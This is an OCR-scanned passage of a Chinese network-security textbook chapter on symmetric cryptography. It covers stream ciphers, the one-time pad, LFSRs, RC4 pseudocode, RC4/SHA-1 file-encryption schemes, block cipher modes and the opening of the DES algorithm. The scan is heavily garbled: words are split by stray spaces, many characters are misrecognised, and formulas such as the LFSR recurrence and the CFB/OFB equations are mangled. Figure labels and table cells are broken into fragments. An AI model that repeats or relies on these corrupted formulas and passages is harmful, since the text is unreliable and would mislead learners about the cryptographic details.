密码 就 像 内 衣 : 你 不 会 让 人 看 见 , 得 常 换 , 还 有 ,你 不 该 与 陌生 人 分 享 。 
—Chris Pirillo 


从 密码 体制 方面 而 言 ,可 将 计算 密码 分 为 对 称 密码 体制 (Symmetric Key Cryptography) 和 
非 对 称 密码 体制 (Asymmetric Key Cryptography) ,对 称 密码 体制 要 求 加 解密 双方 拥有 相同 
的 密 钥 。 而 非 对 称 密码 体制 是 加 密 解密 双方 拥有 不 同 的 密 钥 ,在 不 知道 某 些 秘密 信息 的 情 
况 下 ,加 密 密 钥 和 解密 密 钥 在 计算 上 相互 算出 是 不 可 行 的。 而 混合 密码 体制 就 是 上 述 两 种 
技术 的 有 效 结合 : 用 非 对 称 密 钥 加 密 一 个 对 称 密 钥 ,再 用 这 个 对 称 密 钥 加 密 真 正 的 消息 。 


4.1 对 称 密 钥 密码 


4.1.1 计算 对 称 密码 的 将 点 


计算 对 称 密 钥 密码 9 又 称 为 现代 对 称 密 钥 密码 ,与 古典 密码 均 属 于 对 称 密码 体制 ,两 者 
具有 以 下 主要 区 别 。 

1. 面向 对 象 不 同 

古典 密码 是 面向 字符 的 密码 (Character-Oriented Cipher) ,计算 对 称 密 钥 密码 是 面向 比 
特 的 密码 (Bit-Oriented Cipher) 。 

2. 设计 思想 不 同 

古典 密码 的 设计 没有 考虑 Kerckhoff 原理 ,因此 古典 密码 的 安全 性 基于 算法 和 密 钥 的 
同时 保密 ; 计算 对 称 密 钥 密码 考虑 Kerckhoff 原理 ,因此 计算 对 称 密 钥 密码 的 安全 性 必须 
只 基于 密 钥 的 保密 。 

3. 针对 敌手 不 同 

古典 密码 的 敌手 针对 人 ,因此 算法 通常 是 : 已 知 算法 和 密 钥 手 算 可 行 ,而 未 知 算法 和 密 
钥 则 手 算 不 可 行 ; 计算 对 称 密 钥 密码 的 敌手 面向 人 和 计算 机 ,因此 算法 的 设计 必须 达到 : 


@ 本章 未 做 特殊 说 明 ,对 称 密码 均 指 计算 对 称 密 钥 密码 。 


秦 于 案例 的 网 络 安全 技术 与 实践 


已 知 密 钥 ,计算 机 在 计算 上 可 行 ; 未 知 密 钥 ,计算 机 在 计算 上 不 可 行 。 

对 称 密码 通常 用 两 种 基本 技术 来 隐藏 明文 : 扩散 和 混乱 。 扩 散 (Diffusion) 隐 藏 明文 和 
密 文 之 间 的 关系 ,通过 将 明文 元 余 度 分 散 到 密 文中 使 之 分 散 开 来 ,即将 单个 明文 或 密 钥 位 的 
影响 尽 可 能 扩大 到 更 多 的 密 文 中 去 。 这 样 就 隐藏 了 统计 关系 同时 也 使 密码 分 析 者 寻求 明文 
元 余 度 将 会 更 难 ,产生 扩散 最 简单 的 方法 是 通过 置换 (Permutation) ,置换 的 特点 是 保持 明文 所 
有 符号 不 变 , 只 是 利用 置换 打 乱 了 明文 的 位 置 和 次 序 。 混 乱 (Confusion) 用 于 掩盖 密 钥 与 密 文 
之 间 的 关系 ,混乱 通常 通过 代 换 (Substitution) 来 实现 , 代 换 是 明文 符号 被 密 文 符号 所 代替 。 


4.1.2 流 密码 基本 概念 


流 密码 (Stream Cipher) 又 称 为 序列 密码 ,是 将 明文 划分 成 字符 (如 单个 字母 ) ,或 其 编 
码 的 基本 单元 (如 按 位 ) ,字符 分 别 与 密 钥 流 作用 进行 加 密 , 解 密 时 以 同步 产生 的 同样 的 密 钥 
流 实现 。 流 密码 往往 依赖 于 一 个 随机 数 序 列 ,这样 序 列 算法 的 安全 性 取决 于 随机 数 序列 的 
安全 性 。 密 码 学 中 利用 数学 的 方法 产生 的 随机 数 称 为 伪 随 机 数 ,因为 它们 不 是 真正 随机 的 ， 
只 是 重复 的 周期 非常 大 而 已 ,因此 , 流 密 码 强度 完全 依赖 于 密 钥 序列 的 随机 人 性 
(Randomness) 和 不 可 预测 性 (Unpredictability) ,设计 流 密 码 的 核心 问题 是 密 钥 流 的 产生 以 
及 保持 收发 两 端 密 钥 流 的 精确 同步 。 典 型 的 序列 算法 有 RC4、SEAL 等 。 

1. 流 密码 的 基本 体制 

流 密码 的 基本 思想 : 产生 一 个 密 钥 流 & 一 所 As … ,根据 下 面 规则 加 密 明 文 M=mims…; 
解密 密 文 C 一 CiCz… 一 Eki(za ) Ekz (m2)***。 

同步 流 密码 (Synchronous Stream Cipher) : 在 一 个 同步 流 密码 中 , 密 钥 是 独立 于 明文 
和 密 文 的 , 即 密 钥 流 的 生成 和 使 用 和 明文 比特 或 密 文 比特 无 关 。 对 于 同步 流 密码 ,只 要 通信 
双方 的 密 钥 序列 产生 器 具有 相同 的 种 子 密 钥 和 相同 的 初始 状态 ,就 能 产生 相同 的 密 钥 序列 。 
在 保密 通信 过 程 中 ,通信 的 双方 必须 保持 精确 的 同步 , 收 方才 能 正确 解密 ,如 果 失 步 收 方 将 
不 能 正确 解密 。 例 如 ,如 果 通 信 中 丢失 或 增加 了 一 个 密 文 字符 , 则 收 方 的 解密 将 一 直 错 误 ， 
直到 重新 邮 步 为 止 。 这 是 同步 流 密码 的 一 个 主要 缺点 。 但 是 同步 流 密码 对 失 步 的 敏感 性 ， 
使 我 们 能 够 容易 检测 插入 、 删 除 、 重 播 等 主动 攻击 。 同 步 流 密码 的 一 个 优点 是 没有 错误 传 
播 , 当 通 信 中 某 些 密 文 字符 产生 了 错误 (如 0 变 成 1, 或 1 变 成 0) ,只 影响 相应 字符 的 解密 ， 
不 影响 其 他 字符 ,如 图 4.1 所 示 。 


天 


| 


滚动 密 钥 生成 器 
K, 


M, 
DrA(C?) 


图 4.1 同步 流 密码 体制 模型 : 密 钥 流 与 明文 串 相互 独立 


自 同步 流 密 码 (Self-Synchronous Stream Cipher) : 如 果 密 钥 序列 产生 算法 与 明文 ( 密 
文 ) 相 关 , 则 所 产生 的 密 钥 序列 也 与 明文 ( 密 文 ) 相 关 ,我 们 称 这 类 序列 密码 为 自 同步 流 密码 。 


由 于 自 同步 流 密码 的 密 钥 序列 与 明文 ( 密 文 ) 相 关 , 所 以 加 密 时 如 果 某 位 明文 出 现 错误 (如 0 
变 成 1, 或 1 变 成 0) ,就 会 影响 后 续 的 密 文 也 发 生 错误 。 解 密 时 如 果 某 位 密 文 出 现 错误 ,就 
会 影响 后 续 的 明文 也 发 生 错 误 , 从 而 造成 错误 传播 。 具体 的 加 解密 错误 传播 长 度 与 其 密 钥 
流产 生 算法 的 结构 有 关 。 对 于 自 同步 流 密 码 , 在 失 步 (如 密 文 出 现 插 入 或 删除 ) 后 ,只 要 接收 
端 连续 接收 到 一 定数 量 的 正确 密 文 后 ,通信 双方 的 密 钥 流产 生 器 便 会 自动 地 恢复 同步 ,因此 
被 称 为 自 同步 流 密码 。 

2. 设计 流 密码 的 主要 原则 

(1) 加 密 序 列 的 周期 要 长 。 伪 随机 数 发 生 器 实质 上 使 用 的 是 产生 确定 的 比特 流 的 函 
数 , 该 比特 流 最 终 将 出 现 重 复 。 重复 的 周期 越 长 ,密码 分 析 的 难度 就 越 大 。 这 与 维 吉利 亚 密 
码 的 考虑 从 本 质 上 是 一 致 的 , 即 密 钥 越 长 密码 分 析 越 困难 。 

(2) 密 钥 流 应 该 尽 可 能 地 接近 于 一 个 真正 的 随机 数 流 的 特征 。 例 如 ,1 和 0 的 个 数 应 近 
似 相等 。 若 密 钥 流 为 字 节 流 , 则 所 有 256 种 可 能 的 字 节 值 出 现 的 频率 应 近似 相等 。 密 钥 流 
的 随机 特性 越 好 , 则 密 文 越 随机 ,密码 分 析 就 越 困难 。 

(3) 伪 随 机 数 发 生 器 的 输出 取决 于 输入 密 钥 的 值 。 为 了 防止 穷 举 攻击 , 密 钥 应 该 足够 
长 ,对 于 分 组 密码 也 要 有 同样 的 考虑 。 因 此 ,从 目前 的 软 硬 件 技术 发 展 来 看 ,至 少 应 当 保证 
密 钥 长 度 不 小 于 128 位 。 

通过 设计 合适 的 伪 随 机 数 发 生 器 , 流 密 码 可 以 提供 和 相应 密 钥 长 度 分 组 密码 相当 的 安 
全 性 。 流 密码 的 主要 优点 是 ,其 相对 于 分 组 密码 来 说 ,往往 速度 更 快 而 且 需 要 编写 的 代码 更 
少 。 分 组 密码 的 优点 是 可 以 重复 使 用 密 钥 ,然而 ,如 果 用 流 密 码 对 两 个 明文 加 密 时 使 用 相同 
的 密 钥 , 则 密码 分 析 就 会 相当 容易 。 如 果 对 两 个 密 文 流 进行 异 或 ,得 出 的 结果 就 是 两 个 原始 
明文 的 异 或 。 如 果 明 文 仅仅 是 文本 串 、 信 用 卡号 或 者 其 他 已 知 特征 的 字 节 流 , 则 密码 分 析 极 
易 成 功 。 


4.1.3 流 密码 实例 


1. 一 次 一 密 密 码 (one-time pad) 

一 种 理想 的 加 密 方案 ,叫做 一 次 一 密 密 码 (one-time pad) ,由 Major Joseph Mauborgne 和 
AT&T 公司 的 Gilbert Vernam 在 1917 年 发 明 的 。 一 次 一 密 乱 码 本 是 一 个 大 的 不 重复 的 真 随 
机 密 钥 字 母 集 ,这 个 密 钥 字母 集 被 写 在 几 张 纸 上 ,并 一 起 粘 成 一 个 乱码 本 。 发 方 用 乱码 本 中 
的 每 一 密 钥 字 母 准确 地 加 密 一 个 明文 字符 ,每 个 密 钥 只 用 一 次 。 加 密 是 明文 字符 和 一 次 一 
密 乱 码 本 密 钥 字 符 的 模 26 加 法 。 

案例 : 明文 

onetimepad 

密 钥 

TBFRGFARFM 

密 文 

IPKLPSFHGO 


因为 


计算 密码 


贡 上 站 


基于 案例 的 网 络 安 会 其 术 与 实践 


O+Tmod 26= I,N+B mod 26=P,E+F mod 26=K, 


在 这 种 密码 中 , 密 钥 完全 是 随机 选 出 的 ,并 且 长 度 相同 ,每 一 密 钥 序 列 和 明文 序列 都 是 
等 概率 的 出 现 ,敌手 没有 任何 信息 用 来 确认 哪 一 密 钥 序列 和 明文 消息 是 正确 的 ,在 理论 上 是 
不 可 破译 的 无 条 件 安 全 。 但 这 种 密码 在 应 用 时 要 求 密 钥 与 明文 具有 相同 长 度 、 且 不 可 重复 
使 用 ,增加 了 密 钥 分 配 与 管理 的 困难 。 通 常 采用 的 对 策 是 用 一 个 较 小 的 密 钥 来 伪 随 机 地 生 
成 密 钥 流 。 

2. 线性 反馈 移 位 寄存 器 (Linear Feedback Shift Register, LFSR) 

通常 ,产生 密 钥 流 序列 的 硬件 是 反馈 移 位 寄存 器 。 一 个 反馈 移 位 寄存 器 由 两 部 分 组 成 ， 
移 位 寄存 器 和 反馈 函数 。 移 位 寄存 器 由 个 寄存 器 组 成 ,每 个 寄存 器 只 能 存储 一 个 二 进 制 
位 ,在 一 个 控制 时 钟 周 期 内 ,根据 寄存 器 当前 的 状态 计算 反馈 函数 f(ki ,ks,… ,k,) 作 为 下 一 
时 钟 周期 的 内 容 , 每 次 输出 最 右边 一 位 ,同时 ,寄存 器 中 所 有 位 都 右 移 一 位 ,最 左 端 的 位 
由 反馈 函数 计算 得 到 。 线 性 反馈 移 位 寄存 器 工作 流程 如 图 4. 2 所 示 。 其 一 般 公 式 如 下 : 
kitn=f (ki skitn1) = cokiOD* De ikitn1 ,其 中 : 人 0,c=0 或 1, 由 是 模 2 加 法 。 


十 十 “= 
a 
kn | | kon kr 


La Fe 


| 一 输出 序列 


4.2 线性 反馈 移 位 寄存 器 工作 流程 


线性 反馈 移 位 寄存 器 的 主要 特点 : 

(1) 对 于 级 线性 反馈 移 位 寄存 器 ,不 可 能 产生 全 0 状态 ,因此 ,最 大 可 能 周期 为 2" 一 1。 

(2) 选择 线性 反馈 移 位 寄存 器 作为 密 钥 流 生成 器 的 主要 原因 有 : 适合 硬件 实现 ; 
@ 能 产生 大 的 周期 序列 ; @ 能 产生 良好 的 统计 特性 的 序列 ; @ 它 的 结构 能 够 应 用 代数 方法 
进行 很 好 的 分 析 。 

(3) 实际 应 用 中 ,通常 将 多 个 LFSR 组 合 起 来 构造 非 线 性 反馈 移 位 寄存 器 ,n 级 非 线 性 
反馈 移 位 寄存 器 产生 伪 随 机 序列 的 周期 最 大 可 达到 2" ,因此 研究 产生 最 大 周期 序列 的 方法 
具有 重要 意义 。 

案例 : 一 个 四 级 线性 反馈 移 位 寄存 器 ,如 图 4. 3 所 示 , 如 果 种 子 是 (0001), ,给 出 其 输出 
序列 ,并 给 出 其 循环 周期 。 


输出 序列 
“| 加 -| 慷 上 | 加 | 高 二 


J 


图 4.3 四 级 线性 反馈 移 位 寄存 器 


解 : 带 入 种 子 得 kskzkiko 二 0001,k 王 旬 ko, 因 此 密 钥 流 为 : 1000100110101111 
1000100110101111 1000100110101111 ”1000100110101111…, 因 此 其 循环 周期 为 15, 即 


达到 周期 的 最 大 值 2" 一 1 二 2 一 1 二 15, 从 而 获得 最 佳 的 随机 性 。 

3. RC4 

RC4 是 一 个 可 变 密 钥 长 度 、 面 向 字 节 操作 的 流 密码 。 该 算法 以 随机 置换 为 基础 。 每 输 
出 一 字 节 的 结果 仅 需要 8 到 16 条 机 器 操作 指令 。RC4 可 能 是 应 用 最 广泛 的 流 密码 。 它 被 
用 于 SSL/TLS( 安 全 套 接 字 协议 /传输 层 安全 协议 ) 标 准 , 该 标准 是 为 网 络 浏览 器 和 服务 器 
间 通 信 而 制定 的 。 它 也 应 用 于 作为 IEEE 802. 11 无 线 局 域 网 标准 一 部 分 的 WEP 协议 。 

RC4 算法 非常 简单 ,易于 描述 : 用 1 一 256 个 字 节 (8 一 2048 位 ) 的 可 变 长 度 密 钥 初始 化 
一 个 256 个 字 节 的 状态 矢量 S,S 的 元 素 记 为 SL0],S[1],…,S[255], 从 始 至 终 置 换 后 的 S 
包含 0 一 255 的 所 有 8 比特 数 。 对 于 加 密 和 解密 , 字 节 K 由 S 中 的 256 个 元 素 按 一 定 方式 
选 出 一 个 元 素 而 生成 。 每 生成 一 个 K 的 值 ,S 中 的 元 素 就 被 重新 置换 一 次 。 

1) 初始 化 S 

开始 时 ,S 中 元 素 的 值 被 置 为 按 升序 从 0 一 255, 即 S[0]==0,S[1]=1,…,S[255]= 
255。 同 时 建立 一 个 临时 矢量 了 。 如 果 密 钥 开 的 长 度 为 256 字 节 , 则 将 K 赋 给 工 。 否 则 , 若 
密 钥 长 度 为 keylen 字 节 , 则 将 K 的 值 赋 给 T 的 前 keylen 个 元 素 , 并 循环 重复 用 K 的 值 赋 
给 了 剩 下 的 元 素 , 直 到 T 的 所 有 元 素 都 被 赋值 。 这 些 预 操作 可 概括 如 下 : 

/* 初始 化 * / 

for i=0 to 255 do 

S[i]=i; 

T[i] = K[i mod keylen] 
然后 用 工 产生 S 的 初始 置换 。 从 SL0] 一 SL255], 对 每 个 S[ 可 ,根据 由 T[ 站 确定 的 方案 ,将 
S[ 门 置换 为 S 中 的 另 一 字 节 : 


/*S 的 初始 序列 * / 

j=0 

for i=0 to 255 do 
j=(j+s[i] +T[i])mod 256 
swap(s[i], s[j]); 


因为 对 S 的 操作 仅 是 交换 ,所 以 唯一 的 改变 就 是 置换 。S 仍然 包含 所 有 值 为 0 一 255 的 
元 素 。 
2) 密 钥 流 的 生成 
矢量 S 一 旦 完成 初始 化 ,输入 密 钥 就 不 再 被 使 用 。 密 钥 流 的 生成 是 从 SL0]~S[L255]， 
对 每 个 SLC 让 ,根据 当前 S 的 值 ,将 SI 可 与 S 中 的 另 一 字 节 置 换 。 当 SL255] 完 成 置换 后 , 操 
作 继续 重 复 , 从 SL0J 开 始 : 


/* 密 钥 流 的 产生 * / 
i,j=0 

while(true) 

i= (i+1)mod 256 
j=(j+S[i])mod 256 
swap(s[i], s[j]) 

t= (s[i] + s[j])mod 256; 
k= S[t] 


计划 密码 


山名 


秦 于 案例 的 网 络 安全 技术 与 实践 


加 密 中 ,将 & 的 值 与 下 一 明文 字 节 异 或 ; 解密 中 ,将 的 值 与 下 一 密 文字 节 异 或 。 
3) 加 密 方案 


以 RC4 算法 为 核心 加 密 算法 给 出 3 种 加 密 方案 ,如 图 4. 4 一 图 4. 6 所 示 ,其 中 方案 一 与 
方案 二 类 似 。 方 案 一 与 方案 二 要 求 发 送 方 与 接收 方 持 有 相同 的 原始 密 钥 。 方 案 三 不 要 求 发 
送 方 与 接收 方 使 用 相同 的 原始 密 钥 ,但 发 送 方 必须 将 本 次 加 密 密 钥 传送 给 接收 方 。 


发 送 方 
原始 密码 文件 内 容 摘要 = 使 用 接收 方 的 公 钥 对 其 加 密 


ER 


用 SHA-1 得 到 本 次 使 用 的 密码 | 


RC4 算 法 产生 密 钥 流 
原始 明文 LO. 文件 密 文 


密 送 给 接 
文件 密 文 + 摘要 密 文 | 将 密 文 发 送 给 接收 方 。 
接收 方 
接收 方 私 钥 
1 
一 =| 摘要 密 文 上 ~| ”摘要 原 密码 
的 密 久 用 SHA-1 得 到 本 次 使 用 的 密码 
摘 收 到 的 密 文 rear 有 
RC4 算 法 产生 
| 文件 密 文 
图 4.4 方案 一 
原始 密码 | | 文件 内 容 摘要 接收 一 | 文件 密 文 :文件 摘要 
发 1 接 i 1 
送 | 用 SHA-! 得 到 本 次 使 用 的 密码 | 。 收 | 文件 密 文 | | 文件 摘要 原 密码 
方 方 
RC4 算 法 产生 密 钥 流 
用 SHA-1 得 到 本 次 使 用 的 密码 
原始 明文 
RC4 算 法 产生 密 钥 流 
文件 密 广 
1 
文件 密 文 + 文件 内 容 摘要 
发 过 明文 


4.5 方案 二 


原始 密码 文件 内 容 摘要 


用 SHA-1 得 到 本 次 使 用 的 密码 | 一 一 | 使 用 接受 方 的 公 钥 对 其 加 窗 


RC4 算 法 产生 密 钥 流 


原始 明文 和 一 汪 | 文 作出 文 一 | 文件 密 文 + 密码 密 文 


接收 方 私 钥 


一 一 | 密码 密 文 一 解密 密码 


接收 到 的 密 文 关 i | 
一 一 一 一 | 文件 密 文 + 密码 密 文 RC4 算 法 产生 密 钥 流 


一 | 文件 密 文 明文 


图 4.6 方案 三 


方案 一 与 方案 二 流程 基本 一 致 ,只 是 方案 二 没有 对 文件 内 容 摘 要 (可 使 用 数字 签名 时 所 
使 用 的 文件 内 容 摘 要 ) 进 行 加 密 。 以 方案 二 为 例 , 发 送 方 与 接收 方 共享 同一 个 密 钥 ,该 种 方 
案 与 WEP 加 密 协 议 类 似 , 具 体 流程 如 下 。 

发 送 方 : 发 送 方 首先 将 所 持 有 的 密 钥 , 即 本 文中 的 原始 密码 (160 位 ) 与 文件 内 容 摘要 
(160 位 ) 进 行 连接 ,然后 用 SHA-1 安全 散 列 函数 对 连接 的 结果 进行 计算 得 到 本 次 加 密 文件 
所 使 用 的 密 钥 (160 位 ) 。 然 后 将 本 次 加 密 所 使 用 的 密 钥 传 给 RC4 算法 ,用 RC4 算法 产生 的 
密 钥 流 与 原始 明文 按 字 节 进 行 异 或 , 即 可 得 到 文件 的 加 密 密 文 。 最 后 将 文件 的 加 密 密 文 与 
文件 内 容 摘要 连接 ,发送 给 接收 方 。 

接收 方 : 接收 方 收 到 密 文 之 后 ,首先 将 密 文 拆 分 成 文件 加 密 密 文 和 文件 内 容 摘要 ,然后 
将 接收 方 自己 所 持 有 的 原始 密码 与 文件 内 容 摘要 连接 并 用 SHA-1 安全 散 列 函数 进行 计算 ， 
得 到 本 次 解密 所 使 用 的 解密 密 钥 。 将 解密 密 钥 传输 给 RC4 算法 ,用 RC4 算法 产生 的 密 钥 
流 与 文件 的 密 文 按 字 节 进 行 异 或 , 即 可 解密 文件 得 到 原始 明文 。 

方案 三 与 方案 一 方案 二 的 最 大 区 别 是 : 方案 一 方案 二 的 发 送 方 与 接收 方 所 持 有 的 原 
始 密码 必须 相同 ,否则 无 法 解密 。 方 案 三 发 送 方 与 接收 方 所 持 有 的 原始 密码 可 以 相同 也 可 
以 不 同 , 但 是 发 送 方 必须 将 本 次 加 密 时 所 使 用 的 密 钥 发 送 给 接收 方 , 而 且 只 有 接收 方 能 将 得 
到 的 密 钥 密 文 解密 ,其 他 人 均 不 可 。 方 案 三 具体 流程 如 下 。 

发 送 方 : 发 送 方 首先 将 所 持 有 的 密 钥 , 即 本 文中 的 原始 密码 (160 位 ) 与 文件 内 容 摘 要 
(160 位 ) 进 行 连接 ,然后 用 SHA-1 安全 散 列 函数 对 连接 的 结果 进行 计算 得 到 本 次 加 密 文件 
所 使 用 的 密 钥 (160 位 ) 。 然 后 将 密 钥 传 给 RC4 算法 ,同时 用 接收 方 的 公 钥 对 本 次 使 用 的 密 
钥 进行 加 密 得 到 密 钥 密 文 。 用 RC4 算法 产生 的 密 钥 流 与 原始 明文 按 字 节 进行 异 或 , 即 可 得 
到 文件 的 加 密 密 文 。 最 后 将 文件 的 加 密 密 文 与 密 钥 密 文 连接 ,发送 给 接收 方 。 

接收 方 : 接收 方 接收 到 密 文 ,首先 将 密 文 拆 分 成 文件 加 密 密 文 和 密 钥 密 文 。 然 后 接收 
方 用 自己 的 私 钥 将 密 钥 密 文 进行 解密 得 到 解密 密码 。 将 解密 密码 传 给 RC4 算法 ,用 RC4 


计划 密码 


贡 人 站 


秦 于 案例 的 网 络 安全 技术 与 实践 


算法 产生 的 密 钥 流 与 文件 的 密 文 按 字 节 进行 异 或 , 即 可 解密 文件 得 到 原始 明文 。 
4.1.4 分 组 密码 基本 概念 


对 明文 的 一 组 位 进行 运算 ,这些 位 组 称 为 分 组 或 块 (Block) ,相应 的 算法 称 为 分 组 密码 
或 块 密码 (Block Cipher) ,使 用 分 组 密码 容易 实现 同步 ,因为 一 个 密 文 组 的 传输 错误 或 丢失 
不 会 影响 其 他 组 ,而 且 , 分 组 容易 标准 化 ,因为 在 今天 的 数据 网 络 通 信 中 ,信息 通常 是 被 成 块 
地 处 理 和 传输 的 ,其 中 典型 分 组 长 度 为 64 位 。 常 用 的 分 组 密码 算法 有 : 数据 加 密 标准 DES 
(Data Encryption Standard ) 算法、 国际 信息 加 密 算法 (International Data Encryption 
Algorithm,IDEA) 等 。 

1. 分 组 密码 工作 模式 

明文 分 组 固定 ,消息 的 数据 量 不 同 , 数 据 格式 各 式 各 样 。 为 了 适应 各 种 应 用 环境 ,有 4 
种 工作 模式 : 电子 密码 本 (Electronic Codebook Mode, ECB) 、 密 码 分 组 链接 (Cipher Block 


Chaining,CBC) 密码 反馈 (Cipher Feedback,CFB) .输出 反馈 (Output Feedback,OFB)。 它 
们 被 广泛 应 用 于 SSL、Kerberos 等 多 种 常用 安全 协议 中 ,总 结 如 表 4. 1 所 示 。 


表 4.1 分 组 密码 的 工作 模式 比较 
模式 描述 与 公式 特 点 
优点 : 简单 且 有 效 ,可 并 行 ,误差 不 传递 ,适合 传 
每 个 明文 组 独立 地 以 同一 密 钥 加 密 。 送 短 数据 。 


Ci=Ex(P,) © P=Dxk(C,) 


缺点 : 不 能 隐藏 明文 的 模式 信息 ,对 明文 的 主动 
攻击 敏感 


CBC 


加 密 算法 的 输入 是 当前 明文 组 与 前 一 密 文 
组 的 异 或 。 
Ci=Ek(C-: 思 Pi) © Pi=Er(C)OC 


优点 : 隐藏 明文 的 模式 信息 ,对 明文 的 主动 攻击 困 
难 ,安全 性 好 于 ECB, 适 于 传送 数据 分 组 和 认证 。 
缺点 : 无 已 知 并 行 算法 ,误差 传递 


CFB 


每 次 只 处 理 输 入 的 j 比特 ,将 上 一 次 的 密 文 
用 作 加 密 算法 的 输入 以 产生 伪 随 机 输出 ,该 
输出 再 与 当前 明文 异 或 以 产生 当前 密 文 。 
S ,为 移 位 寄存 器 ,) 为 流 单元 宽度 : 

加 密 : C; 二 Pi 外 (Ex (S,;) 的 高 j 位 ), Si+1 一 
(SG 

解密 : P; 二 C; 旬 (Ek (S;) 的 高 j 了 位 ), Si+i 二 
(< 


优点 : 隐藏 明文 的 模式 信息 , 适 于 传送 数据 流 和 
认证 。 
缺点 : 无 已 知 并 行 算法 ,误差 传递 ,需要 共同 的 移 
位 寄存 器 初始 值 IV, 且 对 于 不 同 的 消息 IV 必须 
唯一 


OFB 


与 CFB 类 似 ,不 同 之 处 是 本 次 加 密 算法 的 输 
入 为 前 一 次 加 密 算法 的 输出 。S; 为 移 位 寄 
存 器 ,j 为 流 单元 宽度 : 

加 密 : C; 二 P; 四 (Exk (5S;) 的 高 了 位), Si+1 一 
(Sj 二 二 ))| (Ek (S;) 的 高 j 位) 

解密 : P; 二 C; 田 (Ek (S;) 的 高 了 位 ), Si+1 二 
(S; 二 二 站 1 (Ek (S; ) 的 高 j 位 ) 


2. 分 组 密码 设计 核心 要 素 
分 组 密码 可 以 设计 为 代 换 密码 或 换 位 密码 ,但 设计 中 不 可 或 缺 的 要 素 是 代 换 。 
案例 : 假设 有 一 个 N 二 64 的 分 组 密码 ,如 果 密 文中 有 10 个 1, 针对 下 述 两 种 情况 ,攻击 


优点 : 隐藏 明文 的 模式 信息 ,误差 不 传递 , 适 于 传 
送 有 扰 信 道上 (无 线 通 讯 ) 数 据 流 。 

缺点 : 无 已 知 并 行 算 法 ,需要 共同 的 移 位 寄存 器 
初始 值 IV, 对 明文 的 主动 攻击 敏感 ,安全 性 较 
CFB 差 


者 要 做 多 少 次 测试 ,才能 把 每 次 拦截 的 密 文 恢 复 成 明文 ? 

(1) 密码 只 设计 为 换 位 密码 。 

(2) 密码 只 设计 为 代 换 密码 。 

分 析 : 针对 (1) ,因为 换 位 不 能 改变 密 文 中 1( 或 0) 的 个 数 , 攻 击 者 可 以 准确 地 知道 明文 
中 有 10 个 1, 他 可 以 利用 准确 含有 10 个 1 的 64 位 分 组 ,发 动 穷 举 攻击 。 在 2 个 含有 10 个 
1 的 64 比特 的 字 中 , 仅 有 641/[(101)(541)]= 二 151473214816 个 符合 要 求 ,如 果 攻 击 者 可 以 
每 秒 测试 10 亿 个 分 组 , 则 可 以 约 在 151. 5 秒 内 测试 完全 部 可 能 情况 。 

针对 (2) ,由 于 采用 代 换 方式 ,攻击 者 不 知道 明文 中 有 多 少 个 1( 或 0) ,他 必须 要 测试 所 
有 可 能 的 2 个 64 比特 的 分 组 , 找 出 其 中 一 个 合理 的 。 如 果 攻 击 者 可 以 每 秒 测试 10 亿 个 分 
组 , 则 对 比 完全 部 分 组 需要 2*/[(10000000000)(3600)(24)(365)] 584 年 ,因此 取得 成 
功 之 前 也 要 评价 花费 数 百年 的 时 间 。 


4.1.5 分 组 密码 实例 : DES 算法 


1. DES 算法 概述 

DES(Data Encryption Standard) 于 1977 年 得 到 美国 政府 的 正式 许可 , 它 是 一 个 对 称 算 
法 : 加 密 和 解密 用 的 是 同一 算法 ( 除 密 钥 编排 不 同 以 外 ), 既 可 用 于 加 密 又 可 用 于 解密 。 它 
的 核心 技术 是 : 在 相信 复杂 函数 可 以 通过 简单 函数 迭代 若干 圈 得 到 的 原则 下 ,利用 下 函数 
及 置换 等 运算 ,充分 利用 非 线 性 运算 。DES 以 64 位 为 分 组 对 数据 加 密 。 每 组 64 位 ,最 后 
一 组 若 不 足 64 位 ,以 “0” 补 齐 。 密 钥 通常 表示 为 64 位 的 数 ,但 每 个 第 8 位 都 用 作 奇 偶 校 验 ， 
可 以 忽略 ,所 以 密 钥 的 长 度 为 56 位 , 密 钥 可 以 是 任意 的 56 位 的 数 , 且 可 在 任意 的 时 候 改 变 。 
其 中 极 少 量 的 数 被 认为 是 弱 密 钥 ,但 能 容易 地 避 开 它们 ,所 有 的 保密 性 依赖 于 密 钥 。 

2. DES 算法 的 加 密 分 析 

1) DES 算法 的 基本 思想 

DES 对 64 位 的 明文 分 组 进行 操作 。 通 过 一 个 初始 置换 ,将 明 


文 分 组 分 成 左 半 部 分 (Lu) 和 右 半 部 分 (R) ,各 32 位 长 。R, 与 子 密 。 中 竺 文 效 所 

钥 Ki 进行 下 函数 的 运算 ,输出 32 位 的 数 ,然后 与 L, 执 行 异 或 操 初始 置换 IP 

作 得 到 Ri,L; 则 是 上 一 轮 的 Ru, 如 此 经 过 16 轮 后 , 左 、 右 半 部 分 一 一 

合 在 一 起 ,经 过 一 个 未 置换 (初始 置换 的 着 置换 ) 输 出 结果 ,算法 完 | 。 在 和 榴 这 人 

成 。DES 整体 结构 流程 图 如 图 4.7 所 示 , 其 中 带 有 密 钥 变换 的 

DES 一 轮 迭 代 如 图 4. 8 所 示 。 交换 左右 32 比 特 
2) 初始 旺 斤 TI 
初始 置换 在 第 一 轮 运算 前 执行 ,对 输入 分 组 实施 如 表 4. 2 所 

示 的 变换 (此 表 应 从 左 向 右 . 从 上 向 下 读 )。 例 如 ,初始 位 置 把 明文 。[ 箱 出 G4 比 特 密 文 数据 


的 第 58 位 换 到 第 1 位 的 位 置 ,把 第 50 位 换 到 第 2 位 的 位 置 ,把 第 
42 位 换 到 第 3 位 的 位 置 ……。 初 始 置换 和 对 应 的 末 置 换 并 不 影响 
DES 的 安全 性 。 它 的 主要 目的 是 为 更 容易 地 将 明文 与 密 文 数据 以 
字 节 大 小 放 入 DES 芯片 中 。 


图 4.7 DES 整体 结构 
流程 图 


计算 绽 码 
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图 4.8 带 有 密 钥 变 换 的 DES 一 轮 迭 代 


表 4.2 初始 置换 IP 


58 50 42 34 26 18 10 2 
60 52 44 36 28 20 12 4 
62 54 46 38 30 22 14 6 
64 56 48 40 32 24 16 8 
57 49 41 33 25 17 9 1 
59 51 43 35 27 19 11 3 
61 53 45 37 29 21 13 5 
63 55 47 39 31 23 15 V8 
3) 子 密 钥 的 生成 


子 密 钥 的 产生 如 图 4. 9 所 示 。 将 64 位 密 钥 进行 密 钥 置换 ,不 考虑 每 个 字 节 的 第 8 位 ， 
DES 密 钥 由 64 位 减 至 56 位 ,56 位 密 钥 被 分 成 两 部 分 ,前 28 位 为 Cu, 后 28 位 为 Du 。 
CG, = RuKsKu KoaRKu Ra Db = 区 人次 二 下 5 Ra Ri 
接着 ,根据 轮 数 ,C; 和 DD; 分 别 经 过 LS; 循环 左 移 1 位 或 2 位 。16 次 循环 左 移 的 位 数 依 
